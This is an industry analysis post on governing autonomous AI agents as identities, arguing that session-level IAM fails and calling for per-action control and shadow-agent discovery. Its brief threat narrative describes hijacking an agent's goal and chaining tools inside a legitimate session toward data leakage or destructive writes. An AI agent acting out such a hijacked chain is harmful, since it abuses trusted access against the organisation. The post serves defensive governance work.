Securing the agentic workforce: why existing IAM controls fail

At a glance

What this is: This is an analysis of how autonomous AI agents create a new enterprise workforce attack surface, and the key finding is that static IAM and security controls do not contain agentic behaviour well enough.

Why it matters: It matters because IAM, PAM, and governance programmes now have to cover non-human actors that decide, chain, and execute actions at machine speed, not just humans and service accounts.

By the numbers:

• Independent surveys put adoption above 72% of organizations either using or testing AI agents, with 40% running multiple agents in production workflows.
• The average employee navigates around 10 different applications a day.

👉 Read Pillar Security's analysis of securing the agentic workforce

Context

AI agents are autonomous non-human identities that can select actions, invoke tools, and trigger downstream workflows without a human approving each step. That changes identity governance because the subject of control is no longer a person or a fixed service account, but a runtime actor whose intent can shift during execution.

Most enterprise security stacks were built on the assumption that humans decide and software executes deterministically. Agentic systems break that model by introducing reasoning, tool chaining, and machine-speed execution that existing monitoring, review, and approval loops cannot reliably see or stop.

The result is a governance gap across NHI, PAM, and emerging agentic AI programmes. Organizations that already treat workload identity and secrets as lifecycle-managed assets will recognise the pattern, but autonomous agents raise the bar because access is not just provisioned, it is actively composed into action paths in real time.

Key questions

Q: How should security teams govern autonomous AI agents in production?

A: Security teams should govern autonomous AI agents as runtime identities, not just applications. That means tracking ownership, restricting tool scope, and enforcing action-level controls for each meaningful step the agent takes. Session approval alone is too weak because the risk often emerges after the session starts, when the agent chains tools and decisions at machine speed.

Q: Why do autonomous agents break existing IAM assumptions?

A: Autonomous agents break IAM assumptions because identity no longer maps cleanly to a stable human operator or a fixed request. The actor can choose tools, change context, and execute actions without waiting for a person to approve each step. That makes traditional access review, static policy, and session-only authorization incomplete for agent governance.

Q: What do teams get wrong about shadow AI agents?

A: Teams often assume that if an agent is not in central IAM, it is not part of the security problem. In practice, shadow agents can be created in notebooks, SaaS tools, and developer environments, then hold secrets or reach production systems without monitoring. Discovery must cover the full environment, not just sanctioned platforms.

Q: What should organisations do before scaling agentic workflows?

A: Before scaling agentic workflows, organisations should define who owns each agent, what it is allowed to do, and where intervention will happen if behaviour drifts. They should also test whether tools can be chained into unsafe outcomes even when individual permissions look reasonable. That is the real governance test for autonomous systems.

Technical breakdown

Agentic workforce identity and reasoning layer

An autonomous AI agent is not just a tool user. It is an identity-bearing runtime that decides which data to read, which tools to call, and what sequence of actions to take. The critical technical issue is the reasoning layer, where the agent can stay within granted permissions while still reaching harmful outcomes through legitimate-looking steps. That is why traditional packet, endpoint, and SIEM controls miss the highest-risk behaviour. The control problem sits above execution, in the decision path itself.

Practical implication: teams need visibility into agent decision paths, not just authenticated sessions and downstream API calls.

Action control versus session control

Most IAM models authorize access at session start and assume the rest of the interaction remains bounded. Agentic systems invalidate that assumption because the most dangerous state change can occur mid-session after fresh context, tool output, or prompt influence. In other words, the security boundary cannot stop at login or token issuance. If the actor can chain reasoning steps and invoke multiple tools, the control point has to follow the action, not the session envelope.

Practical implication: replace session-only trust with per-action authorization and live intervention points.

Shadow agent exposure across code, SaaS, and endpoints

Agent populations do not stay neatly inside cloud IAM or central security inventory. Developers can spin up agents in notebooks, business users can create them in low-code tools, and coding assistants can connect to external MCP servers outside normal enterprise oversight. Some of those agents hold secrets on endpoints or operate without active monitoring, which turns discovery into a first-order control issue. Governance fails when the inventory is incomplete, because you cannot secure what you have not identified.

Practical implication: build continuous discovery for agent identities, their tool links, and the systems they can reach.

Threat narrative

Attacker objective: The attacker aims to turn a trusted autonomous agent into a high-speed execution path for unauthorized access, data leakage, or workflow abuse.

1. Entry begins when an attacker hijacks an agent’s goal or abuses a compromised non-human identity that the agent already trusts.
2. Escalation occurs as the agent chains tools and data access inside a legitimate session, turning ordinary steps into misaligned or destructive actions.
3. Impact lands when the agent writes to databases, calls downstream APIs, or propagates harmful decisions at machine speed without human interruption.

Breaches seen in the wild

• Moltbook AI agent keys breach — Moltbook breach exposed 1.5M AI agent keys.
• AI LLM hijack breach — attackers used stolen AWS access keys to hijack Anthropic LLM models on Bedrock.

Read our 52 NHI Breaches Analysis report for a comprehensive view of breaches impacting Non-Human Identities including AI Agents.

NHI Mgmt Group analysis

Autonomous identity governance is collapsing because access review assumes access remains stable long enough to be reviewed. That assumption was designed for human-paced and service-account-paced control loops. It fails when an autonomous agent can acquire context, combine tools, and complete harmful action chains within a single session. The implication is that existing review cadences no longer describe the actual risk state, so practitioners must rethink what governance is trying to observe.

Action control is becoming the real security boundary for AI agents. Traditional IAM authorizes who can enter a session and what systems are theoretically reachable, but autonomous actors can remain within those boundaries while composing unsafe behaviour. That is why static policy is not enough for the agentic workforce, and why the field has to move from permission sets to governed action paths. Practitioners should treat machine-speed decisioning as a distinct control problem, not a bigger version of NHI sprawl.

Shadow agents create a discovery failure before they create a policy failure. If developers, SaaS platforms, and business users can instantiate agents outside central oversight, then governance starts after the environment has already expanded beyond the security team's line of sight. This is a named visibility gap in the agentic workforce, and it explains why inventory, ownership, and runtime monitoring are now inseparable. Practitioners need to assume the agent estate is larger than the sanctioned estate.

Agentic AI security now sits at the intersection of NHI, PAM, and governance, not in a separate category. The same lifecycle discipline used for service accounts still matters, but autonomous behaviour adds decision timing and tool selection as new variables. That makes cross-domain identity governance the only durable model. Practitioners should align agent identity, privilege, and runtime behaviour under one operating model instead of treating them as separate projects.

The agentic workforce is a force multiplier for both productivity and blast radius. When organizations scale from a few assistants to thousands of autonomous actors, the security problem becomes multiplicative rather than additive. That changes procurement, audit, and incident response assumptions across the whole identity programme. The field now has to govern the rate at which autonomous actors are created as carefully as the access they receive.

From our research:

• Independent surveys put adoption above 72% of organizations either using or testing AI agents, with 40% running multiple agents in production workflows, according to AI Agents: The New Attack Surface report.
• Only 52% of companies can track and audit the data their AI agents access, leaving 48% with a complete blind spot for compliance and breach investigation.
• That visibility gap is why the broader agentic risk picture should be read alongside OWASP Agentic AI Top 10, which maps the control failures teams need to test next.

What this signals

Autonomous workforce governance will converge with NHI lifecycle management faster than most identity programmes expect. The practical issue is no longer whether agents can be onboarded, but whether their creation, scope, and offboarding are auditable at the same speed they operate. Teams that already manage service-account lifecycle discipline have the right starting point, but they will need to add runtime visibility and action-level enforcement to stay current.

Agentic sprawl will force IAM and security operations to share a single inventory view. If agents exist in code repositories, SaaS tools, endpoints, and cloud platforms, then a fragmented asset register becomes a control failure. The programme implication is simple: ownership, access scope, and runtime evidence need to sit in one operational model, not across disconnected tools.

The strongest near-term signal is whether your organisation can prove what its agents touched, not just what they were allowed to touch. That is where the governance conversation is moving, and it is where zero-trust thinking meets autonomous execution. When the estate scales, continuous verification and post-action traceability become the difference between manageable risk and unbounded blast radius.

For practitioners

• Map every autonomous agent to an accountable owner Create an inventory of agent identities, the data and systems they touch, and the human team responsible for each agent’s runtime behaviour. Include shadow agents created in notebooks, low-code tools, and developer assistants so discovery is not limited to central IAM records.
• Move from session approval to action-level control Require policy checks at each meaningful agent action, especially tool calls, database writes, external API requests, and workflow triggers. Keep a live intervention path available so unsafe chains can be stopped before downstream execution completes.
• Separate agent privileges from human workflows Do not inherit human access patterns for autonomous systems. Define narrow, task-scoped permissions for each agent role, then validate that the agent cannot compose otherwise safe permissions into a harmful sequence across tools and systems.
• Instrument runtime behaviour, not just configuration drift Monitor what agents actually do during execution, including tool selection, context changes, and unusual action chains. Pair this with continuous discovery so runtime alerts are matched to the full set of known and unknown agents.
• Align governance with OWASP NHI Top 10 and agentic risk models Use OWASP NHI Top 10 and OWASP Agentic AI Top 10 guidance to structure reviews of agent identity, tool access, and cascading failure modes. This helps security, IAM, and compliance teams speak the same control language when assessing risk.

Key takeaways

• Autonomous AI agents turn identity governance into an action-control problem because they can chain decisions, tools, and workflows at machine speed.
• Survey data in the source points to broad adoption, with 72% of organizations already using or testing agents and 40% running multiple agents in production workflows.
• Practitioners should prioritise inventory, ownership, and per-action intervention before scaling the agentic workforce further.

Key terms

• Agentic Workforce: A population of AI agents that operate inside an enterprise as autonomous actors with roles, access, and action authority. Unlike simple automation, these systems can choose tools, sequence tasks, and trigger downstream work. That makes them identity subjects that require governance, monitoring, and lifecycle control.
• Action Control: A governance approach that authorizes each meaningful action an agent takes, not just the initial session or credential. It is more precise than session-only access control because agent risk often appears mid-execution, after context changes or tool chaining. The control objective is to constrain behaviour as it unfolds.
• Shadow Agent: An AI agent created outside central security oversight, often by developers, business users, or SaaS tooling. Shadow agents may never appear in the main IAM inventory yet can still hold secrets, call APIs, or access production systems. The governance issue is discovery, ownership, and runtime traceability.
• Agentic Identity Management: The discipline of identifying, scoping, and governing AI agent identities across their lifecycle, access, and behaviour. It extends standard non-human identity management by adding runtime decisioning, tool usage, and autonomous execution timing as first-class control concerns.

Deepen your knowledge

Agentic workforce governance and runtime control are core topics in our NHI Foundation Level course, the industry's only accredited NHI security programme. If you are building controls for autonomous agents from the ground up, it is worth exploring.

This post draws on content published by Pillar Security: Securing the Agentic Workforce. Read the original.